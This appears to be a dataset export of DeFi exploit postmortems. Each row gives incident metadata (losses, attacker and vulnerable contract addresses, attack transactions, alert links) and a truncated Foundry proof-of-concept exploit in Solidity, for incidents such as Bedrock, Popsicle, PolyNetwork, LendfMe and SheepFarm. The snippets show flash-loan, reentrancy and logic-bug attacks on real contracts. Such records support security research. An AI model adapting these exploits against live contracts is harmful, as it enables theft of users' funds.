// Attack Contract : https://etherscan.io/address/0x0C8da4f8B823bEe4D5dAb73... | exploit_poc | Bedrock_DeFi | 2024-09 | Bedrock_DeFi_exp.sol | flash_loan | d73edbf37249cabd | 2026-01-07T10:59:16.534172 | postmortems | ethereum | 20,836,584 | ~1.7M US$ | 1,700,000 | https://etherscan.io/address/0x2bFB373017349820dda2Da8230E6b66739BE9F96 | https://etherscan.io/address/0x0C8da4f8B823bEe4D5dAb73367D45B5135B50faB | https://etherscan.io/address/0x047D41F2544B7F63A8e991aF2068a363d210d6Da | https://etherscan.io/tx/0x725f0d65340c859e0f64e72ca8260220c526c3e0ccde530004160809f6177940 | null | null | true | false | true | critical | ~1.7M US$ | flash-loan | function testPoCMinimal() public {
// Borrow 200 ether to the attacker
vm.deal(attacker, 200e18);
// The attacker mint 200 ETH to 200 uniBTC
vm.startPrank(attacker);
IFS(VulVault).mint{value: 200e18}();
// The attacker received 200 uniBTC(~BTC) for 200 ETH
conso... | true | ~1.7M US$ | https://etherscan.io/address/0x2bFB373017349820dda2Da8230E6b66739BE9F96 | https://etherscan.io/address/0x0C8da4f8B823bEe4D5dAb73367D45B5135B50faB | https://etherscan.io/address/0x047D41F2544B7F63A8e991aF2068a363d210d6Da | https://etherscan.io/tx/0x725f0d65340c859e0f64e72ca8260220c526c3e0ccde530004160809f6177940 | $1.70M | 9.47 | high | Bedrock_DeFi Exploit (2024-09) | true | true | true | false | ||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : $1.7k
// Attacker : https://etherscan.io/address/0xf073a21f0d68adacfff34d5b8df04550c944e348
// Attack Contract : https://etherscan.io/address/0xd683b81c2608980db90a6fd730153e04629ff1a3
// Vulnerable Contract : ... | exploit_poc | unverified_03f9 | 2024-09 | unverified_03f9_exp.sol | null | a4c5b55759d96032 | 2026-01-07T10:59:16.534227 | postmortems | ethereum | 20,737,848 | $1.7k | 1,700 | https://etherscan.io/address/0xf073a21f0d68adacfff34d5b8df04550c944e348 | https://etherscan.io/address/0xd683b81c2608980db90a6fd730153e04629ff1a3 | https://etherscan.io/address/0x03f911aedc25c770e701b8f563e8102cfacd62c0 | https://etherscan.io/tx/0x1a3e9eb5e00f39e84f90ca23bd851aa194b1e7a90003e3f6b9b17bbb66dabbb9 | https://x.com/TenArmorAlert/status/1834488796953673862 | https://x.com/TenArmorAlert/status/1834488796953673862 | true | true | false | low | $1.7k | unknown | function testPoC() public {
emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18);
vm.startPrank(attacker, attacker);
AttackerC attC = new AttackerC();
// deal(address(attC), 0.7370354703656878 ether); // give only ether
deal(weth9, addr... | true | $1.7k | https://etherscan.io/address/0xf073a21f0d68adacfff34d5b8df04550c944e348 | https://etherscan.io/address/0xd683b81c2608980db90a6fd730153e04629ff1a3 | https://etherscan.io/address/0x03f911aedc25c770e701b8f563e8102cfacd62c0 | https://etherscan.io/tx/0x1a3e9eb5e00f39e84f90ca23bd851aa194b1e7a90003e3f6b9b17bbb66dabbb9 | https://x.com/TenArmorAlert/status/1834488796953673862 | https://x.com/TenArmorAlert/status/1834488796953673862 | $1.7K | 7.32 | medium | unverified_03f9 Exploit (2024-09) | true | true | true | true |
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
address constant attacker = 0xfe51ffcd2af4748d77130646988F966733583dc1;
address constant addr1 = 0xb3094734FE249A7b0110dC12D66F6C404aDA28Cb;
address constant weth = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
// @KeyInfo - Total Lost : ... | exploit_poc | unverified_a89f | 2024-09 | unverified_a89f_exp.sol | null | 1eee2ebe0517f264 | 2026-01-07T10:59:16.534273 | postmortems | ethereum | 20,683,453 | $1.5k | 1,500 | https://etherscan.io/address/0xfe51ffcd2af4748d77130646988f966733583dc1 | https://etherscan.io/address/0xa826dacf14a462bca2a6e4de4c27f20ed7b43b1d | https://etherscan.io/address/0xb3094734fe249a7b0110dc12d66f6c404ada28cb | https://app.blocksec.com/explorer/tx/eth/0x83c71a83656b0fecfa860e76a9becf738930b3f1b2510c7d0339ab585090a82d | https://x.com/TenArmorAlert/status/1831637553415610877 | https://x.com/TenArmorAlert/status/1831637553415610877 | true | true | false | low | $1.5k | unknown | function testPoC() public {
vm.startPrank(attacker, attacker);
AttackerC attC = new AttackerC();
attC.attack();
vm.stopPrank();
emit log_named_decimal_uint("after attack: balance of address(attC)", IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2).balanceOf(address(attC)), 18);... | true | $1.5k | https://etherscan.io/address/0xfe51ffcd2af4748d77130646988f966733583dc1 | https://etherscan.io/address/0xa826dacf14a462bca2a6e4de4c27f20ed7b43b1d | https://etherscan.io/address/0xb3094734fe249a7b0110dc12d66f6c404ada28cb | https://app.blocksec.com/explorer/tx/eth/0x83c71a83656b0fecfa860e76a9becf738930b3f1b2510c7d0339ab585090a82d | https://x.com/TenArmorAlert/status/1831637553415610877 | https://x.com/TenArmorAlert/status/1831637553415610877 | $1.5K | 7.11 | medium | unverified_a89f Exploit (2024-09) | true | true | true | true |
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 1.4K USD
// Attacker : 0x7248939f65bdd23aab9eaab1bc4a4f909567486e
// Attack Contract : https://etherscan.io/address/0xbdb0bc0941ba81672593cd8b3f9281789f2754d1
// Vulnerable Contract :
// Attack Tx : https://ap... | exploit_poc | PestoToken | 2024-09 | PestoToken_exp.sol | null | 51694bac01db08e1 | 2026-01-07T10:59:16.534328 | postmortems | ethereum | 20,811,949 | 1.4K USD | 1,400 | null | https://etherscan.io/address/0xbdb0bc0941ba81672593cd8b3f9281789f2754d1 | null | https://app.blocksec.com/explorer/tx/eth/0x3d5b4a0d560e8dd750239b578e2b85921b523835b644714dc239a2db70cf067c | https://x.com/TenArmorAlert/status/1838225968009527652 | https://x.com/TenArmorAlert/status/1838225968009527652 | true | true | false | low | 1.4K USD | unknown | function testPoC() public {
emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18);
vm.startPrank(attacker, attacker);
AttackerC attC = new AttackerC();
attC.attack{value: 4.59e-16 ether}();
vm.stopPrank();
emit log_named_decimal_... | true | 1.4K USD | https://etherscan.io/address/0xbdb0bc0941ba81672593cd8b3f9281789f2754d1 | https://app.blocksec.com/explorer/tx/eth/0x3d5b4a0d560e8dd750239b578e2b85921b523835b644714dc239a2db70cf067c | https://x.com/TenArmorAlert/status/1838225968009527652 | https://x.com/TenArmorAlert/status/1838225968009527652 | $1.4K | 8 | high | PestoToken Exploit (2024-09) | true | false | true | true | ||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 283 USD
// Attacker : https://etherscan.io/address/0x7248939f65bdd23aab9eaab1bc4a4f909567486e
// Attack Contract : https://etherscan.io/address/0xbdb0bc0941ba81672593cd8b3f9281789f2754d1
// Vulnerable Contract ... | exploit_poc | HANAToken | 2024-09 | HANAToken_exp.sol | null | 671ff95c81bcf0c5 | 2026-01-07T10:59:16.534400 | postmortems | ethereum | 20,827,436 | 283 USD | 283 | https://etherscan.io/address/0x7248939f65bdd23aab9eaab1bc4a4f909567486e | https://etherscan.io/address/0xbdb0bc0941ba81672593cd8b3f9281789f2754d1 | https://etherscan.io/address/0xb3912b20b3abc78c15e85e13ec0bf334fbb924f7 | https://app.blocksec.com/explorer/tx/eth/0xe8cee3450545a865b4a8fffd93938ae93429574dc8e01b02bc6a02f2f4490e4e | https://x.com/TenArmorAlert/status/1838963740731203737 | https://x.com/TenArmorAlert/status/1838963740731203737 | true | true | false | low | 283 USD | unknown | function testPoC() public {
emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18);
vm.startPrank(attacker, attacker);
AttackerC attC = new AttackerC();
attC.attack{value: 3.9e-16 ether}();
vm.stopPrank();
emit log_named_decimal_u... | true | 283 USD | https://etherscan.io/address/0x7248939f65bdd23aab9eaab1bc4a4f909567486e | https://etherscan.io/address/0xbdb0bc0941ba81672593cd8b3f9281789f2754d1 | https://etherscan.io/address/0xb3912b20b3abc78c15e85e13ec0bf334fbb924f7 | https://app.blocksec.com/explorer/tx/eth/0xe8cee3450545a865b4a8fffd93938ae93429574dc8e01b02bc6a02f2f4490e4e | https://x.com/TenArmorAlert/status/1838963740731203737 | https://x.com/TenArmorAlert/status/1838963740731203737 | $283 | 9 | high | HANAToken Exploit (2024-09) | true | true | true | true |
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : $6.8k
// Attacker : https://bscscan.com/address/0xcc116696f9852c238a5c8d3d96418ddba02357fc
// Attack Contract : https://bscscan.com/address/0x62f57a14c2e8f3ac9db05b81c8170d60f91f1b7a, https://bscscan.com/addres... | exploit_poc | AIRBTC | 2024-09 | AIRBTC_exp.sol | null | 109098d98eb1652c | 2026-01-07T10:59:16.534462 | postmortems | bsc | 42,157,592 | $6.8k | 6,800 | https://bscscan.com/address/0xcc116696f9852c238a5c8d3d96418ddba02357fc | https://bscscan.com/address/0x62f57a14c2e8f3ac9db05b81c8170d60f91f1b7a, | https://bscscan.com/address/0x12050e4355a392162698c6cf30eb8c9e0777300d | https://app.blocksec.com/explorer/tx/bsc/0x00e4bbc86369d67e21b1910c4f9178c8257ce96192039a7839bd4d3593e1cd27 | https://x.com/TenArmorAlert/status/1833825098962550802 | https://x.com/TenArmorAlert/status/1833825098962550802 | true | true | false | low | $6.8k | unknown | function testPoC() public {
emit log_named_decimal_uint("before attack: balance of attacker", IERC20(0x55d398326f99059fF775485246999027B3197955).balanceOf(attacker), 18);
vm.startPrank(attacker, attacker);
AttackerC attC = new AttackerC();
vm.stopPrank();
emit log_named_decimal_u... | true | $6.8k | https://bscscan.com/address/0xcc116696f9852c238a5c8d3d96418ddba02357fc | https://bscscan.com/address/0x62f57a14c2e8f3ac9db05b81c8170d60f91f1b7a, | https://bscscan.com/address/0x12050e4355a392162698c6cf30eb8c9e0777300d | https://app.blocksec.com/explorer/tx/bsc/0x00e4bbc86369d67e21b1910c4f9178c8257ce96192039a7839bd4d3593e1cd27 | https://x.com/TenArmorAlert/status/1833825098962550802 | https://x.com/TenArmorAlert/status/1833825098962550802 | $6.8K | 7.81 | medium | AIRBTC Exploit (2024-09) | true | true | true | true |
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : $12K
// Attacker : https://etherscan.io/address/0x0000daaee5fbc2d3fc5a5c0cb456d2c24e4f81de
// Attack Contract :
// Vulnerable Contract :
// Attack Tx : https://app.blocksec.com/explorer/tx/eth/0x3f0dc68dc89fc... | exploit_poc | unverified_5697 | 2024-09 | unverified_5697_exp.sol | null | 36bf1f24a6a7aebd | 2026-01-07T10:59:16.534510 | postmortems | ethereum | 20,738,427 | $12K | 12,000 | https://etherscan.io/address/0x0000daaee5fbc2d3fc5a5c0cb456d2c24e4f81de | null | null | https://app.blocksec.com/explorer/tx/eth/0x3f0dc68dc89fce3250b9d2de2611384b8af258e83f7a711f666917c5590d13d2 | https://x.com/TenArmorAlert/status/1834432197375533433 | https://x.com/TenArmorAlert/status/1834432197375533433 | true | true | false | medium | $12K | unknown | function testPoC() public {
emit log_named_decimal_uint("before attack: balance of attacker", IERC20(weth9).balanceOf(attacker), 18);
vm.startPrank(addr2);
IWETH9(weth9).approve(attacker, type(uint256).max);
vm.stopPrank();
vm.startPrank(attacker, attacker);
IWETH9(weth9)... | true | $12K | https://etherscan.io/address/0x0000daaee5fbc2d3fc5a5c0cb456d2c24e4f81de | https://app.blocksec.com/explorer/tx/eth/0x3f0dc68dc89fce3250b9d2de2611384b8af258e83f7a711f666917c5590d13d2 | https://x.com/TenArmorAlert/status/1834432197375533433 | https://x.com/TenArmorAlert/status/1834432197375533433 | $12.0K | 5.75 | medium | unverified_5697 Exploit (2024-09) | true | false | true | true | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 21 ETH
// Attacker : https://etherscan.io/address/0xd861e6f1760d014d6ee6428cf7f7d732563c74c0
// Attack Contract : https://etherscan.io/address/0x542533536e314180e1b9f00b2c046... | exploit_poc | Pythia | 2024-09 | Pythia_exp.sol | null | 7a1810e894828ba6 | 2026-01-07T10:59:16.534554 | postmortems | ethereum | null | 21 ETH | 21 | https://etherscan.io/address/0xd861e6f1760d014d6ee6428cf7f7d732563c74c0 | https://etherscan.io/address/0x542533536e314180e1b9f00b2c046f6282eb3647 | https://etherscan.io/address/0xe2910b29252F97bb6F3Cc5E66BfA0551821C7461 | https://etherscan.io/tx/0x7e19f8edb1f1666322113f15d7674593950ac94bbc25d2aff96adabdcae0a6c3 | null | https://x.com/QuillAudits_AI/status/1830976830607892649 | true | true | false | low | 21 ETH | unknown | function testExploit() public balanceLog {
//implement exploit code here
vm.deal(address(this), 1 ether);
AttackContract attackContract = new AttackContract();
attackContract.stake{value: 0.5 ether}();
attackContract.claimRewards();
}
}
contract AttackContract {
address... | true | 21 ETH | https://etherscan.io/address/0xd861e6f1760d014d6ee6428cf7f7d732563c74c0 | https://etherscan.io/address/0x542533536e314180e1b9f00b2c046f6282eb3647 | https://etherscan.io/address/0xe2910b29252F97bb6F3Cc5E66BfA0551821C7461 | https://etherscan.io/tx/0x7e19f8edb1f1666322113f15d7674593950ac94bbc25d2aff96adabdcae0a6c3 | https://x.com/QuillAudits_AI/status/1830976830607892649 | $21 | 7.81 | medium | Pythia Exploit (2024-09) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
/*
Lendf.Me Reentry Exploit PoC
See https://peckshield.medium.com/uniswap-lendf-me-hacks-root-cause-and-loss-analysis-50f3263dcc09 for more detail
Example tx - https://etherscan.io/tx/0xae7d664bd... | exploit_poc | LendfMe | 2020-04 | LendfMe_exp.sol | null | 13c4d010ba631155 | 2026-01-07T10:59:16.534604 | postmortems | ethereum | 9,899,725 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
emit log_named_uint("[Before Attack]Victim imBTC Balance : ", (imBTC.balanceOf(victim)));
emit log_named_uint("[Before Attack]Attacker imBTC Balance : ", (imBTC.balanceOf(attacker)));
// prepare
imBTC.approve(victim, type(uint256).max);
erc1820.se... | true | Unknown | 3.54 | low | LendfMe Exploit (2020-04) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// import "./utils.sol";
interface IEthCrossChainManager {
function verifyHeaderAndExecuteTx(
bytes memory proof,
bytes memory rawHeader,
bytes memory headerProof,
... | exploit_poc | PolyNetwork | 2021-08 | PolyNetwork_exp.sol | null | c2159157b5db1bcb | 2026-01-07T10:59:16.534731 | postmortems | ethereum | 12,996,658 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
// "Poly has a contract called the "EthCrossChainManager". It's a privileged contract that has the right to trigger messages from another chain. It's a standard thing for cross-chain projects.
// It has a function named verifyHeaderAndExecuteTx that anyone can call to ex... | true | Unknown | 5 | medium | PolyNetwork Exploit (2021-08) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// Analysis
// https://medium.com/@Knownsec_Blockchain_Lab/wault-finance-flash-loan-security-incident-analysis-368a2e1ebb5b
// https://inspexco.medium.com/wault-finance-incident-analysis-wex-price... | exploit_poc | WaultFinance | 2021-08 | WaultFinance_exp.sol | null | bae5f93d778db7d8 | 2026-01-07T10:59:16.534841 | postmortems | bsc | 9,728,755 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
// borrow WUSD
Pair1Amount = WUSD.balanceOf(address(Pair1)) - 1;
Pair1.swap(Pair1Amount, 0, address(this), new bytes(1));
// WUSD to BUSD
WUSD.approve(address(Router), type(uint256).max);
WUSDToBUSD();
emit log_named_decimal_uint(... | true | Unknown | 3.96 | low | WaultFinance Exploit (2021-08) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.7.0 <0.9.0;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
AMP amp = AMP(0xfF20817765cB7f73d4bde2e66e067E58D11095C2);
IERC1820Regi... | exploit_poc | Cream | 2021-08 | Cream_exp.sol | null | cf6b222e9adaa83d | 2026-01-07T10:59:16.534894 | postmortems | unknown | 13,125,070 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function test() public {
payable(address(0)).transfer(address(this).balance);
ierc1820.setInterfaceImplementer(address(this), TOKENS_RECIPIENT_INTERFACE_HASH, address(this));
mywallet = msg.sender;
uni.swap(0, 500 * 1e18, address(this), "0x00");
emit log_named_uint("Exploit comp... | true | Unknown | 3.54 | low | Cream Exploit (2021-08) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "forge-std/interfaces/IERC20.sol";
// @KeyInfo - Total Lost : 20M USD
// Attacker : https://etherscan.io/address/0xf9E3D08196F76f5078882d98941b71C0884BEa52
// Attack Contract : https://etherscan.io/address/0xdFb6faB7f4bc9... | exploit_poc | Popsicle | 2021-08 | Popsicle_exp.sol | flash_loan | fa46d52c56978dbe | 2026-01-07T10:59:16.534946 | postmortems | ethereum | 12,955,000 | 20M USD | 20,000,000 | https://etherscan.io/address/0xf9E3D08196F76f5078882d98941b71C0884BEa52 | https://etherscan.io/address/0xdFb6faB7f4bc9512d5620e679E90D1C91C4EAdE6 | https://etherscan.io/address/0xc4ff55a4329f84f9Bf0F5619998aB570481EBB48 | https://etherscan.io/tx/0xcd7dae143a4c0223349c16237ce4cd7696b1638d116a72755231ede872ab70fc | https://blocksecteam.medium.com/the-analysis-of-the-popsicle-finance-security-incident-9d9d5a3045c1 | https://twitter.com/BlockSecTeam/status/1422786223156776968 | true | true | true | critical | 20M USD | flash-loan | function testExploit() public balanceLog {
_logBalances("Before attack");
aaveV2.flashLoan(address(this), assetsArr, amountsArr, modesArr, address(this), new bytes(0), 0);
_logBalances("After attack");
} | true | 20M USD | https://etherscan.io/address/0xf9E3D08196F76f5078882d98941b71C0884BEa52 | https://etherscan.io/address/0xdFb6faB7f4bc9512d5620e679E90D1C91C4EAdE6 | https://etherscan.io/address/0xc4ff55a4329f84f9Bf0F5619998aB570481EBB48 | https://etherscan.io/tx/0xcd7dae143a4c0223349c16237ce4cd7696b1638d116a72755231ede872ab70fc | https://blocksecteam.medium.com/the-analysis-of-the-popsicle-finance-security-incident-9d9d5a3045c1 | https://twitter.com/BlockSecTeam/status/1422786223156776968 | $20.00M | 10 | high | Popsicle Exploit (2021-08) | true | true | true | true |
// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.7.0 <0.9.0;
import "forge-std/Test.sol";
import "./../interface.sol";
interface IpancakePair {
function swap(uint256 amount0Out, uint256 amount1Out, address to, bytes calldata da... | exploit_poc | XSURGE | 2021-08 | XSURGE_exp.sol | null | a7e672ca271e6427 | 2026-01-07T10:59:16.535025 | postmortems | unknown | 10,087,723 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
payable(address(0)).transfer(address(this).balance);
ipancake.swap(0, 10_000 * 1e18, address(this), "0x00");
// wbnb.withdraw(wbnb.balanceOf(address(this)));
// VISR_Balance = visr.balanceOf(msg.sender);
//emit log_named_uint("WBNB Balance",wbnb.b... | true | Unknown | 3.43 | low | XSURGE Exploit (2021-08) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// Attack reason: Wrong function logic
// Info about attack: https://twitter.com/BlockSecTeam/status/1592734292727455744
// Tx: https://bscscan.com/tx/0x8b3e0e3ea04829f941ca24c85032c3b4aeb1f8b1b27... | exploit_poc | SheepFarm2 | 2022-11 | SheepFarm2_exp.sol | null | d52f738f6c3b78f4 | 2026-01-07T10:59:16.535070 | postmortems | bsc | 23,089,184 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
uint256 beforeBalance = address(this).balance;
for (uint256 i; i < 4; ++i) {
new AttackContract{value: 5e14}();
}
uint256 afterBalance = address(this).balance;
emit log_named_decimal_uint(
"SheepFarm exploiter profit afte... | true | Unknown | 2.94 | low | SheepFarm2 Exploit (2022-11) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/AnciliaInc/status/1595142246570958848
// @TX
// https://phalcon.blocksec.com/tx/bsc/0xb3bc6ca257387eae1cea3b997eb489c1a9c208d09ec4d117198029277468e25d
// https:... | exploit_poc | AUR | 2022-11 | AUR_exp.sol | null | 07f4e4e524f83680 | 2026-01-07T10:59:16.535116 | postmortems | unknown | 23,282,134 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | function testExploit() public {
AUR.approve(address(AurumNodePool), type(uint256).max);
AUR.approve(address(Router), type(uint256).max);
emit log_named_decimal_uint("[Start] Attacker BNB balance before exploit", address(this).balance, 18);
BNBtoAUR(0.01 ether);
AurumNodePool.c... | true | Unknown | 3.7 | low | AUR Exploit (2022-11) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/BeosinAlert/status/1588579143830343683
// TX
// https://bscscan.com/tx/0xe7b7c974e51d8bca3617f927f86bf907a25991fe654f457991cbf656b190fe94
interface BvaultsStr... | exploit_poc | BDEX | 2022-11 | BDEX_exp.sol | null | f883b0810e32612c | 2026-01-07T10:59:16.535168 | postmortems | bsc | 22,629,431 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | function testExploit() public {
address(WBNB).call{value: 34 ether}("");
uint256 amountin = WBNB.balanceOf(address(this));
WBNB.transfer(address(Pair), amountin);
(uint256 BDEXReserve, uint256 WBNBReserve,) = Pair.getReserves();
uint256 amountout = (998 * amountin * BDEXReserve) ... | true | Unknown | 3.12 | low | BDEX Exploit (2022-11) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/BlockSecTeam/status/1595346020237352960
// @TX
// https://etherscan.io/tx/0x8a8145ab28b5d2a2e61d74c02c12350731f479b3175893de2014124f998bff32
interface Multicha... | exploit_poc | NUM | 2022-11 | NUM_exp.sol | null | 4a86d4cb2ff57c56 | 2026-01-07T10:59:16.535214 | postmortems | ethereum | 16,029,969 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | false | Unknown | 1.27 | low | NUM Exploit (2022-11) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://eigenphi.substack.com/p/casting-a-magic-spell-on-abracadabra
// https://twitter.com/BlockSecTeam/status/1603633067876155393
// @TX
// https://etherscan.io/tx/0x3d163bfbec56... | exploit_poc | Kashi | 2022-11 | Kashi_exp.sol | flash_loan | b0759add92684886 | 2026-01-07T10:59:16.535257 | postmortems | ethereum | 15,928,289 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
MIM.approve(address(Router), type(uint256).max);
address[] memory receivers = new address[](2);
receivers[0] = address(this);
receivers[1] = address(this);
address[] memory tokens = new address[](2);
tokens[0] = address(xSUSHI);
tok... | true | Unknown | 5.25 | medium | Kashi Exploit (2022-11) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/BlockSecTeam/status/1590960299246780417
// https://twitter.com/BeosinAlert/status/1591012525914861570
// https://twitter.com/AnciliaInc/status/15908391047316848... | exploit_poc | DFX | 2022-11 | DFX_exp.sol | null | c8b48e8dc5ce625b | 2026-01-07T10:59:16.535314 | postmortems | ethereum | 15,941,703 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | function testExploit() public {
address(WETH).call{value: 2 ether}("");
WETH.approve(address(Router), type(uint256).max);
USDC.approve(address(Router), type(uint256).max);
USDC.approve(address(dfx), type(uint256).max);
XIDR.approve(address(Router), type(uint256).max);
XID... | true | Unknown | 4.08 | low | DFX Exploit (2022-11) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/CertiKAlert/status/1593094922160128000
// @Tx
// https://bscscan.com/tx/0xb83f9165952697f27b1c7f932bcece5dfa6f0d2f9f3c3be2bb325815bfd834ec
// https://bscscan.co... | exploit_poc | UEarnPool | 2022-11 | UEarnPool_exp.sol | null | 246479a2e284e3cf | 2026-01-07T10:59:16.535377 | postmortems | bsc | 23,120,167 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | function testExploit() public {
contractFactory();
// bind invitor
(bool success,) = contractList[0].call(abi.encodeWithSignature("bind(address)", tx.origin));
require(success);
for (uint256 i = 1; i < 22; i++) {
(bool success,) = contractList[i].call(abi.encodeWithSi... | true | Unknown | 4.91 | low | UEarnPool Exploit (2022-11) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// attacker tx: https://etherscan.io/tx/0xeaef2831d4d6bca04e4e9035613be637ae3b0034977673c1c2f10903926f29c0
// offcial post-mortem: https://medium.com/neptune-mutual/decoding-brahma-brahtopg-smart-c... | exploit_poc | BrahTOPG | 2022-11 | BrahTOPG_exp.sol | null | e7732fc16a03da22 | 2026-01-07T10:59:16.535438 | postmortems | ethereum | 15,933,794 | null | null | null | null | null | null | https://medium.com/neptune-mutual/decoding-brahma-brahtopg-smart-contract-vulnerability-7b7c364b79d8 | null | false | false | false | medium | null | unknown | function testExploit() public {
address(WETH).call{value: 1e15}("");
WETHToFRAX();
uint256 balance = USDC.balanceOf(victimAddress);
uint256 allowance = USDC.allowance(victimAddress, address(zappper));
uint256 amount = balance;
if (balance > allowance) {
amount... | true | Unknown | 3.5 | low | BrahTOPG Exploit (2022-11) | false | false | false | true | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/AnciliaInc/status/1592658104394473472
// https://twitter.com/BlockSecTeam/status/1592734292727455744
// @Tx
// https://bscscan.com/tx/0x5735026e5de6d1968ab5baef... | exploit_poc | SheepFarm | 2022-11 | SheepFarm_exp.sol | null | 5863e043a1e95d78 | 2026-01-07T10:59:16.535482 | postmortems | bsc | 23,088,156 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | function testExploit() public payable {
for (uint8 i = 0; i < 200; i++) {
sheepFram.register(neighbor);
}
sheepFram.addGems{value: 5 * 1e14}();
for (uint8 i = 0; i < 3; i++) {
sheepFram.upgradeVillage(i);
}
sheepFram.sellVillage();
uint256 ... | true | Unknown | 2.81 | low | SheepFarm Exploit (2022-11) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
// Attacker: 0xae39a6c2379bef53334ea968f4c711c8cf3898b6
// Vulnerable Contract: 0x0ad8229d4bc84135786ae752b9a9d53392a8afd4
// Attack Tx: https://phalcon.blocksec.com/tx/eth/0x674f74b30a3d7bdf15fa60a7c29d96a402ea894a055f624164... | exploit_poc | MEV_0ad8 | 2022-11 | MEV_0ad8_exp.sol | null | 3d130f973e36c04b | 2026-01-07T10:59:16.535523 | postmortems | ethereum | 15,926,096 | null | null | null | null | null | https://phalcon.blocksec.com/tx/eth/0x674f74b30a3d7bdf15fa60a7c29d96a402ea894a055f624164a8009df98386a0 | null | null | false | true | false | medium | null | unknown | false | https://phalcon.blocksec.com/tx/eth/0x674f74b30a3d7bdf15fa60a7c29d96a402ea894a055f624164a8009df98386a0 | Unknown | 3.23 | low | MEV_0ad8 Exploit (2022-11) | false | false | true | false | |||||||
//SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/peckshield/status/1597493955939405825
// https://twitter.com/CertiKAlert/status/1597513374841044993
// https://twitter.com/BeosinAlert/status/1597535796621631489
// @TX... | exploit_poc | SEAMAN | 2022-11 | SEAMAN_exp.sol | flash_loan | 96c4aacf51c8a63f | 2026-01-07T10:59:16.535563 | postmortems | bsc | 23,467,515 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
DVM(dodo).flashLoan(0, 800_000 * 1e18, address(this), new bytes(1));
emit log_named_decimal_uint("[End] Attacker USDT balance after exploit", USDT.balanceOf(address(this)), 18);
} | true | Unknown | 4.32 | low | SEAMAN Exploit (2022-11) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/AnciliaInc/status/1597742575623888896
